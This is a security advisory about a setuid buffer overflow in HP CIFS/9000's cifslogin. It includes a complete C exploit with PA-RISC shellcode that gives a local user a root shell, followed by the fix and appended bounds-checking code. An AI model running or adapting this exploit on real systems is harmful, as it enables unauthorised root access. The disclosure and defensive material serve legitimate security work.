HP CIFS Login Buffer Overflow Vulnerability

Published: 2002-11-13
Updated: 2002-11-13
Severity: High
Threat: local administrator privileges
Error type: boundary check error
Exploitation: server mode
BUGTRAQ ID: 5088

Affected systems

HP CIFS/9000 Server A.01.06

Detailed description

The /opt/cifsclient/bin/cifslogin utility shipped with CIFS/9000 contains multiple buffer overflow vulnerabilities in its command-line option handling. Supplying an overly long value to the '-U', '-D', '-P', '-S', '-N' or '-u' option triggers the overflow. Because the program is installed setuid, a local user can abuse this to gain root privileges.

Test code

/*
 * Name    : ex_cifslogin.c
 * Compile : cc ex_cifslogin -o cifslogin
 * Purpose : exploit cifslogin command for HP-UX 11.11 11.0 10.20, to get root shell
 * Author  : watercloud < safesuite@263.net, watercloud@xfocus.net >
 * Date    : 2002-11-6
 * Announce: Use at your own risk.
 * Thanks  : bear < bearundertree@163.com >
 * Tested  : HPUX B11.11
 */
#include <stdio.h>
#include <string.h>   /* strlen, memcpy */
#include <unistd.h>   /* execl */

#define T_LEN    2304          /* total length of the argument passed to cifslogin */
#define BUFF_LEN 2176          /* NOP sled plus shellcode occupy the first BUFF_LEN bytes */
#define NOP      0x0b390280    /* PA-RISC no-op used as sled filler */

char shellcode[] =
    "\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02"
    "\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03"
    "\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA";

long addr;
char buffer[T_LEN];

int main(void)
{
    int addr_off = 800;
    int n = BUFF_LEN / 4, i = 0;
    long *ap = (long *) &buffer[BUFF_LEN];                   /* where the return addresses start */
    char *sp = &buffer[BUFF_LEN - strlen(shellcode)];        /* shellcode sits at the end of the sled */
    long *np = (long *) buffer;

    /* guess the stack position from a local variable's address */
    addr = ((long) &addr_off + T_LEN) & 0xffffff40 + 0x40;

    /* fill the sled with NOPs, then drop the shellcode at its end */
    for (i = 0; i < n; np[i++] = NOP);
    memcpy(sp, shellcode, strlen(shellcode));

    /* the remaining (T_LEN - BUFF_LEN) bytes are copies of the guessed address */
    for (i = 0; i < (T_LEN - BUFF_LEN) / 4; ap[i++] = addr + addr_off);

    printf("SP=0x%lx EXP_SP=0x%lx OFF=0x%x (%i)\n",
           (long) &addr_off & 0xffffff40, addr, addr_off, addr_off);
    printf("Addr =0x%lx NOP_LEN=%lu\n",
           addr + addr_off, (unsigned long) (BUFF_LEN - strlen(shellcode)));
    printf("BUFFER_LEN=%lu\n", (unsigned long) strlen(buffer));

    execl("/opt/cifsclient/bin/cifslogin", "cifslogin", "123", buffer, NULL);
    return 1;   /* only reached if execl fails */
}

Solution

As a temporary workaround, remove the setuid bit from the program; otherwise upgrade to version A.01.07.

Related information

Alex Hernandez <alex_hernandez@ureach.com>
watercloud < safesuite@263.net, watercloud@xfocus.net >
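The root cause described above is the classic unbounded copy of an argv string into a fixed-size field in a setuid program. The following is an added example, not HP's code and not cifslogin's real layout: it shows, for the six flags the advisory names, how a bounded option setter rejects over-long values instead of overflowing. OPT_MAX, the struct, and the function names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define OPT_MAX 64  /* assumed field size; cifslogin's real layout is not known here */

/* One fixed-size field per option the advisory names (assumed layout). */
struct login_opts {
    char user[OPT_MAX];      /* -U */
    char domain[OPT_MAX];    /* -D */
    char password[OPT_MAX];  /* -P */
    char server[OPT_MAX];    /* -S */
    char netbios[OPT_MAX];   /* -N */
    char unixuser[OPT_MAX];  /* -u */
};

/* The overflow class behind the advisory is an unbounded copy of argv
 * into a fixed field, i.e. strcpy(field, value); in a setuid binary the
 * caller's argument length becomes a write past the field.
 * This version bounds the scan, rejects a value that does not fit together
 * with its terminator, and copies only then. Returns 0 on success, -1 if rejected. */
int set_option_checked(char *field, size_t field_len, const char *value)
{
    size_t n = 0;
    while (n < field_len && value[n] != '\0')
        n++;
    if (n == field_len)           /* no NUL inside the field: too long */
        return -1;
    memcpy(field, value, n + 1);  /* n + 1 also copies the terminator */
    return 0;
}

/* Route a cifslogin-style flag to its field. Returns -1 for an unknown
 * flag or an over-long value; the struct is left untouched in both cases. */
int apply_option(struct login_opts *o, const char *flag, const char *value)
{
    char *field = NULL;
    if (strcmp(flag, "-U") == 0)      field = o->user;
    else if (strcmp(flag, "-D") == 0) field = o->domain;
    else if (strcmp(flag, "-P") == 0) field = o->password;
    else if (strcmp(flag, "-S") == 0) field = o->server;
    else if (strcmp(flag, "-N") == 0) field = o->netbios;
    else if (strcmp(flag, "-u") == 0) field = o->unixuser;
    if (field == NULL)
        return -1;
    return set_option_checked(field, OPT_MAX, value);
}
```

A value of exactly OPT_MAX-1 bytes is accepted, OPT_MAX bytes is refused, and a refused option leaves the field untouched, which is the behaviour a patched setuid tool needs for every flag, not only the six listed.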